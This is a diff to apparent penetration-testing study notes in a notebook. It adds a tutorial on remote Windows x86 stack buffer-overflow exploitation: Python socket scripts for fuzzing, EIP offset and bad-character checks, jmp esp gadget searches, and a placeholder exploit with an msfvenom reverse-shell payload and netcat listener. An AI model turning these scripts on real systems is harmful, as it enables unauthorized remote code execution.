--- a/hnetwork_notes.ipynb
+++ b/hnetwork_notes.ipynb
@@ -94,11 +94,14 @@
     "   * **[Finding a Return Instruction](#localboffindrtrninstwinx86)**\n",
     "   * **[Jumping to Shellcode](#localbofjmptoshellcodewinx86)**\n",
     "\n",
-    "\n",
     "* **[Remote BOF: Windows x86 (Method 1)](#remotebofwinquatrevingtseismeth1)**\n",
     "   * **[Fuzzing and EIP Offset Calculation](#remoteboffuzzingeteipoffsetcalcwinx86meth1)**\n",
     "   * **[Bad Characters](#remotebofbadcharswinx86meth1)**\n",
-    "   * **[Setting JMP & Getting a Shell](#remotebofjmpetshellwinx86meth1)**"
+    "   * **[Setting JMP & Getting a Shell](#remotebofjmpetshellwinx86meth1)**\n",
+    "\n",
+    "* **[Remote BOF: Windows x86 (Method 2)](#remotebofwinx86meth2)**\n",
+    "   * **[Remote Fuzzing](#remoteboffuzzingwinx86meth2)**\n",
+    "   * **[Remote Exploitation](#remotebofremexploitwinx86meth2)**"
    ]
   },
   {
@@ -2285,7 +2288,9 @@
     "\n",
     ">**For Remote BOF: Windows 32-bit**\n",
     "\n",
-    "Method 1 shows how to do BOF with **[Immunity Debugger](https://github.com/kbandla/ImmunityDebugger/releases/tag/1.85) and the mona plugin,** which are both essentially deprecated."
+    "Method 1 shows how to do BOF with **[Immunity Debugger](https://github.com/kbandla/ImmunityDebugger/releases/tag/1.85) and the mona plugin,** which are both essentially deprecated.\n",
+    "\n",
+    "Method 2 shows how to do BOF with **[x64dbg](https://github.com/x64dbg/x64dbg) and the [ERC.Xdbg](https://github.com/Andy53/ERC.Xdbg) plugin,** the same as local BOF"
    ]
   },
   {
@@ -2543,6 +2548,8 @@
    "cell_type": "markdown",
    "metadata": {},
    "source": [
+    "> The program can be interacted with normally to determine a valid return instruction; a malicious payload does not need to be sent in this step. Essentially, all that needs to be done is loading the libraries/modules via `ERC --ModuleInfo`, checking which libraries/modules have everything set to False, going to the Symbols tab and clicking that library/module (doing so redirects to the CPU tab), then searching for a 54C3 (push esp; ret) or FFE4 (jmp esp). Try the address of one of the results as the return instruction.\n",
+    "\n",
     "To find a usable address, look at all the instructions used or loaded by the program, pick one of them, and write its address at EIP. In modern systems with Address Space Layout Randomization (ASLR), this will not work because it would change every time the program is executed since it gets randomized. In that case, it would be necessary to follow a method of leaking the current set of addresses in real-time and use it in the exploit; this is not done in the following example, however, as it assumes that there are no protections in the program. \n",
     "\n",
     "To find what instruction to use, it is important to first know what this address is to do. While more advanced binary exploitation methods like ROP rely on using and mapping various local instructions to perform the attack (i.e., sending a reverse shell), this example assumes that the program has most memory protections disabled, so the `Jumping to Stack` method will be used. This method overflows the stack with data and then directs the program execution flow to the stack, such that it starts executing the shellcode. \n",
@@ -2951,6 +2958,210 @@
     "Before running the script, start a netcat listener on the port that was specified from the msfvenom payload. After doing this, a shell should be obtained:\n",
     "```bash\n",
     "nc -lvnp 9999\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id=\"remotebofwinx86meth2\"></a>\n",
+    "\n",
+    "#### **`Remote BOF: Windows x86 (Method 2)`**"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id=\"remoteboffuzzingwinx86meth2\"></a>\n",
+    "\n",
+    "##### **`Remote Fuzzing`**"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "If possible, install the remote program locally and debug it locally to develop an exploit. Once the exploit is fully developed. The process is the same as with local BOF: send large strings in different parameters to see how it handles it.\n",
+    "\n",
+    "**1. Attach Remote Port Connection to Debugger:** The process is the same as with local BOF. Open the program, then open x32dbg, then attach the program to the debugger. Remove all the breakpoints too. \n",
+    "\n",
+    "**2. Fuzz Remote Port:** Once the program is running and attached to the debugger, start fuzzing it and try to crash it. Remote fuzzing can be automated through a Python exploit; the process remains the same, as large strings are input in different parameters in increments of 500 bytes until the program crashes. Have the debugger and script side by side to determine when the program crashes; the script will keep sending bytes until manually stopped. Once the program crashes and EIP gets overwritten, the last amount of bytes sent will be what crashed the program, confirming the BOF vulnerability.\n",
+    "```python\n",
+    "import socket\n",
+    "from struct import pack\n",
+    "\n",
+    "IP = \"x.x.x.x\"\n",
+    "port = xxxx\n",
+    "\n",
+    "def fuzz():\n",
+    "   try:\n",
+    "      for i in range(0,10000,500):\n",
+    "         buffer = b\"A\"*i\n",
+    "         print(\"Fuzzing %s bytes\" % i)\n",
+    "         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n",
+    "         s.connect((IP, port))\n",
+    "         s.send(buffer)\n",
+    "         breakpoint()      #enter c after each increment is sent while tracking the debugger\n",
+    "         s.close()\n",
+    "   except:\n",
+    "      print(\"Could not establish a connection\")\n",
+    "\n",
+    "fuzz()\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id=\"remotebofremexploitwinx86meth2\"></a>\n",
+    "\n",
+    "##### **`Remote Exploitation`**"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "After fuzzing the listening port, the remaining BOF identification and exploitation steps are similar to that of local BOF exploitation:\n",
+    "1. Fuzzing Parameters\n",
+    "2. Controlling EIP\n",
+    "3. Identifying Bad Characters\n",
+    "4. Finding a Return Instruction\n",
+    "5. Jumping to Shellcode\n",
+    "\n",
+    "**<u>Controlling EIP</u>**\n",
+    "\n",
+    "**1. Generate a Unique Pattern:** This pattern should be about ~500 bytes larger than the value that modified EIP from the fuzzing step; i.e., if it took 1000 bytes to overflow the buffer, generate 1500 bytes\n",
+    "```bash\n",
+    "ERC --pattern c 2000\n",
+    "```\n",
+    "**2. Calculate EIP Offset:** Use the generated pattern and add it to a Python script. Restart the program, attach it to the debugger, then execute the script. The program should crash again: determine the EIP string to calculate the EIP offset. With the hex value in EIP, convert it to ASCII and enter it in the plugin\n",
+    "```python\n",
+    "import socket\n",
+    "from struct import pack\n",
+    "\n",
+    "IP = \"x.x.x.x\"\n",
+    "port = xxxx\n",
+    "\n",
+    "def eip_offset():\n",
+    "   pattern = bytes(\"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac\"    #etc\n",
+    "                  \"5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co\", \"utf-8\")\n",
+    "   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n",
+    "   s.connect((IP, port))\n",
+    "   s.send(pattern)\n",
+    "   s.close()\n",
+    "\n",
+    "eip_offset()\n",
+    "```\n",
+    "```bash\n",
+    "ERC --pattern o eip_value_in_ascii\n",
+    "```\n",
+    "**3. Ensure Control of EIP:** To ensure that the exact value at EIP can be controlled, use code similar to the following for this. Run this script while the program is attached to the debugger to view if the EIP corresponds to BBBB in hex (42424242)\n",
+    "```python\n",
+    "import socket\n",
+    "from struct import pack\n",
+    "\n",
+    "IP = \"x.x.x.x\"\n",
+    "port = xxxx\n",
+    "\n",
+    "def eip_control():\n",
+    "   offset = xxxx       #offset bytes; determined by the previous calculation\n",
+    "   buffer = b\"A\"*offset\n",
+    "   eip = b\"B\"*4\n",
+    "   payload = buffer + eip\n",
+    "\n",
+    "   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n",
+    "   s.connect((IP, port))\n",
+    "   s.send(payload)\n",
+    "   s.close()\n",
+    "\n",
+    "eip_control()\n",
+    "\n",
+    "```\n",
+    "**<u>Identifying Bad Characters</u>**\n",
+    "\n",
+    "**1. Identify Bad Characters:** Run the ERC command to create a binary and text file. Copy the hex in the text file (under `C#`) and put them in the script. The null byte should excluded\n",
+    "```bash\n",
+    "ERC --bytearray -bytes 0x00,0x0a       #etc\n",
+    "```\n",
+    "```python\n",
+    "import socket\n",
+    "from struct import pack\n",
+    "\n",
+    "IP = \"x.x.x.x\"\n",
+    "port = xxxx\n",
+    "\n",
+    "def bad_chars():\n",
+    "   all_chars = bytes([\n",
+    "      0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08   #etc\n",
+    "      0xF8, 0xF9, 0xFA, 0xFB, 0xFC, 0xFD, 0xFE, 0xFF\n",
+    "   ])\n",
+    "\n",
+    "   offset = xxxx        #offset bytes;\n",
+    "   buffer = b\"A\"*offset\n",
+    "   eip = b\"B\"*4\n",
+    "   payload = buffer + eip + all_chars\n",
+    "\n",
+    "   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n",
+    "   s.connect((IP, port))\n",
+    "   s.send(payload)\n",
+    "   s.close()\n",
+    "\n",
+    "bad_chars()\n",
+    "```\n",
+    "**2. Compare Bad Characters:** Restart the program in the debugger and run the script. Copy the bytes at the ESP address, then compare them to the previously generated binary file with ERC. Make sure all of the bytes match between memory and the binary file; if not repeat this process and add to the bad character list. \n",
+    "```powershell\n",
+    "ERC --compare esp_byte_value C:\\Path\\To\\ByteArray_1.bin.\n",
+    "\n",
+    "```\n",
+    "**<u>Finding a Return Instruction</u>**\n",
+    "\n",
+    "**1. Find an Instruction to Execute the Payload:** Once EIP control and bad characters are determined, find an instruction to execute the payload that will be placed on the stack. If the program does not have any bad characters, which is highly unlikely, use the ESP address as the return address. In most other cases, use an address of an instruction built within the program to ensure it will run on any system, since the instructions will be the same on any system.\n",
+    "\n",
+    "\n",
+    "**2. List Loaded Libraries and Modules:** Only consider ones that have False for all protections from the program. Refer to the local BOF section on finding a return instruction, since the process is the same. \n",
+    "```bash\n",
+    "ERC --ModuleInfo --NXCompat\n",
+    "```\n",
+    "**3. Select Usable Return Instruction:** Refer to the first note in the local BOF section to determine a usable return instruction. Once the address is gathered, copy it and put it in the exploit\n",
+    "* If there are no results, search for the `FFE4` pattern in the entire module or all modules. \n",
+    "   * This x86 machine code translates to **jmp esp** (FF is the opcode for a group of indirect jump/call instructions; E4 is the ModR/M byte, which tells the CPU to perform a jump to the address stored in ESP register).\n",
+    "* Also search for the `54C3` pattern in the entire module or all modules\n",
+    "   * This x86 machine code translates to **PUSH ESP; RET** (54 indicates pushing the current value of ESP onto the stack; C3 indicates return, or pop the top of the stack into EIP)\n",
+    "\n",
+    "\n",
+    "**<u>Jumping to Shellcode</u>**\n",
+    "\n",
+    "**1. Start listener:** Use the same prot as the exploit\n",
+    "\n",
+    "**2. Exploit the Program:** Generate shellcode with msfvenom to execute arbitrary commands on the server. \n",
+    "```python\n",
+    "import socket\n",
+    "from struct import pack\n",
+    "\n",
+    "IP = \"x.x.x.x\"\n",
+    "port = xxxx\n",
+    "\n",
+    "def exploit():\n",
+    "   #msfvenom -p 'windows/shell_reverse_tcp' LHOST=x.x.x.x LPORT=xxxx -f 'python'\n",
+    "   buf = b\"\"     \n",
+    "   buf += b\"\\xff\\xd5\\x63\\x61\\x6c\\x63\\x2e\\x65\\x78\\x65\\x00\"     #etc\n",
+    "\n",
+    "   offset = xxxx     #offset bytes;\n",
+    "   buffer = b\"A\"*offset\n",
+    "   eip = pack('<L', 0x0069D2E5)        #replace 0x0069D2E5 with found return instruction address \n",
+    "   nop = b\"\\x90\"*32\n",
+    "   payload = buffer + eip + nop + buf\n",
+    "\n",
+    "   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n",
+    "   s.connect((IP, port))\n",
+    "   s.send(payload)\n",
+    "   s.close()\n",
+    "\n",
+    "exploit()\n",
     "```"
    ]
   },
